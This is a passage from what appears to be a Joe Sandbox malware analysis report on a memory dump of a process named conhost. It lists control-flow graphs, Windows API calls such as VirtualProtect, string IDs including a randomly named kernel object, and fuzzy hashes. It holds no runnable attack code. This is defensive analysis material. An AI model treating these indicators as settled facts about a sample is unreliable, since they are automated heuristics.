                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: wcslen$wcscatwcscpywcsncmp
                                                      • String ID: 0$X$\BaseNamedObjects\hztoxpurdxqvywpkpwgleilk$`
                                                      • API String ID: 597572034-777484344
                                                      • Opcode ID: 616dd30e29db12fdc02cbaa5b64d11a1fa0e2ae95b2531fbde53f322a39f1c5b
                                                      • Instruction ID: 831cedccfe1c450249e5303b8802ab8c24b5a681da26d5a4265c78d3475a5d4e
                                                      • Opcode Fuzzy Hash: 616dd30e29db12fdc02cbaa5b64d11a1fa0e2ae95b2531fbde53f322a39f1c5b
                                                      • Instruction Fuzzy Hash: 8D1258B2608BC085E762CB16F8443EAB7A4F789794F414215EBA957BF5EF78C189C700

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                      • String ID:
                                                      • API String ID: 2643109117-0
                                                      • Opcode ID: 00ac1c66197ebc50227b88a6223cca9505f05baf94f6ca9dba6275d7e8e9b764
                                                      • Instruction ID: 853b5cb4b810d97d978816ea4420ec313e3627c3af1e5f4ec8bc55cd55e56463
                                                      • Opcode Fuzzy Hash: 00ac1c66197ebc50227b88a6223cca9505f05baf94f6ca9dba6275d7e8e9b764
                                                      • Instruction Fuzzy Hash: 2D5114B1611A4085FB16EF27F9947EA27A5BB8D7D0F849121FB4D873B6DE38C4958300

                                                      Control-flow Graph

                                                      control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 431 140001be9-140001bf1 428->431 430 140001c0c-140001c17 call 1400023b0 429->430 437 140001cf4-140001cfe call 140001d40 430->437 438 140001c1d-140001c6c call 1400024d0 VirtualQuery 430->438 433 140001bf3-140001c02 431->433 434 140001be0-140001be7 431->434 433->434 436 140001c04 433->436 434->430 434->431 439 140001cd7-140001cf3 memcpy 436->439 442 140001d03-140001d1e call 140001d40 437->442 438->442 445 140001c72-140001c79 438->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->439 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                                      APIs
                                                      • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                      • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                      • memcpy.MSVCRT ref: 0000000140001CE0
                                                      • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                      • API String ID: 2595394609-2123141913
                                                      • Opcode ID: d18d1f09fdfba77917c7540234edc89a1ae34ad00b66a5eb73fbe7bf19acb5c3
                                                      • Instruction ID: ec64a22a3afb06751a644bfa6223830d5787557f53419172101f724c34e2370a
                                                      • Opcode Fuzzy Hash: d18d1f09fdfba77917c7540234edc89a1ae34ad00b66a5eb73fbe7bf19acb5c3
                                                      • Instruction Fuzzy Hash: FB4143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700

                                                      Control-flow Graph

                                                      control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 926137887-0
                                                      • Opcode ID: 27e192ecc5d799857d1c8385dbaaf5a6f836238ff6c117ed4402dc7d43894369
                                                      • Instruction ID: 697f876828b5171767c564f6bb86c971c65e3a042cbe6cf173943f1c4610416a
                                                      • Opcode Fuzzy Hash: 27e192ecc5d799857d1c8385dbaaf5a6f836238ff6c117ed4402dc7d43894369
                                                      • Instruction Fuzzy Hash: D521E0B1715A0292FA5BEB53F9583E923A0B76CBD0F444021FB1E576B4DB7A8986C300

                                                      Control-flow Graph

                                                      control_flow_graph 474 140001e10-140001e2d 475 140001e3e-140001e48 474->475 476 140001e2f-140001e38 474->476 478 140001ea3-140001ea8 475->478 479 140001e4a-140001e53 475->479 476->475 477 140001f60-140001f69 476->477 478->477 482 140001eae-140001eb3 478->482 480 140001e55-140001e60 479->480 481 140001ecc-140001ed1 479->481 480->478 485 140001f23-140001f2d 481->485 486 140001ed3-140001ee2 signal 481->486 483 140001eb5-140001eba 482->483 484 140001efb-140001f0a call 140005ff0 482->484 483->477 490 140001ec0 483->490 484->485 495 140001f0c-140001f10 484->495 488 140001f43-140001f45 485->488 489 140001f2f-140001f3f 485->489 486->485 491 140001ee4-140001ee8 486->491 488->477 489->488 490->485 492 140001eea-140001ef9 signal 491->492 493 140001f4e-140001f53 491->493 492->477 496 140001f5a 493->496 497 140001f12-140001f21 signal 495->497 498 140001f55 495->498 496->477 497->477 498->496
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CCG
                                                      • API String ID: 0-1584390748
                                                      • Opcode ID: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                                      • Instruction ID: 838ee2c544bf2803730cc930bbb0f4a86f91135578be0a2b6e08d954fec56f6a
                                                      • Opcode Fuzzy Hash: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                                      • Instruction Fuzzy Hash: A72159B1A0110642FA77DA1BB5943FA1182ABCD7E4F258535BF1A473F9DE3C88828241

                                                      Control-flow Graph

                                                      control_flow_graph 499 140001880-14000189c 500 1400018a2-1400018f9 call 140002420 call 140002660 499->500 501 140001a0f-140001a1f 499->501 500->501 506 1400018ff-140001910 500->506 507 140001912-14000191c 506->507 508 14000193e-140001941 506->508 509 14000194d-140001954 507->509 510 14000191e-140001929 507->510 508->509 511 140001943-140001947 508->511 514 140001956-140001961 509->514 515 14000199e-1400019a6 509->515 510->509 512 14000192b-14000193a 510->512 511->509 513 140001a20-140001a26 511->513 512->508 516 140001b87-140001b98 call 140001d40 513->516 517 140001a2c-140001a37 513->517 518 140001970-14000199c call 140001ba0 514->518 515->501 519 1400019a8-1400019c1 515->519 517->515 520 140001a3d-140001a5f 517->520 518->515 523 1400019df-1400019e7 519->523 526 140001a7d-140001a97 520->526 524 1400019e9-140001a0d VirtualProtect 523->524 525 1400019d0-1400019dd 523->525 524->525 525->501 525->523 529 140001b74-140001b82 call 140001d40 526->529 530 140001a9d-140001afa 526->530 529->516 536 140001b22-140001b26 530->536 537 140001afc-140001b0e 530->537 540 140001b2c-140001b30 536->540 541 140001a70-140001a77 536->541 538 140001b5c-140001b6c 537->538 539 140001b10-140001b20 537->539 538->529 543 140001b6f call 140001d40 538->543 539->536 539->538 540->541 542 140001b36-140001b57 call 140001ba0 540->542 541->515 541->526 542->538 543->529
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                      • API String ID: 544645111-395989641
                                                      • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                      • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                      • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                      • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

                                                      Control-flow Graph

                                                      control_flow_graph 547 140001800-140001810 548 140001812-140001822 547->548 549 140001824 547->549 550 14000182b-140001867 call 140002290 fprintf 548->550 549->550
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-3474627141
                                                      • Opcode ID: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                                      • Instruction ID: a02188ec0087b42d3f25a0ad686d1475033a3de64a4a15f6bec79cad075d9a0b
                                                      • Opcode Fuzzy Hash: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                                      • Instruction Fuzzy Hash: 1DF09671A14A4482E612EF6AB9417ED6360E75D7C1F50D211FF4D576A5DF3CD182C310

                                                      Control-flow Graph

                                                      control_flow_graph 553 14000219e-1400021a5 554 140002272-140002280 553->554 555 1400021ab-1400021c2 EnterCriticalSection 553->555 556 140002265-14000226c LeaveCriticalSection 555->556 557 1400021c8-1400021d6 555->557 556->554 558 1400021e9-1400021f5 TlsGetValue GetLastError 557->558 559 1400021f7-1400021fa 558->559 560 1400021e0-1400021e7 558->560 559->560 561 1400021fc-140002209 559->561 560->556 560->558 561->560
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 682475483-0
                                                      • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                      • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                      • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                      • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200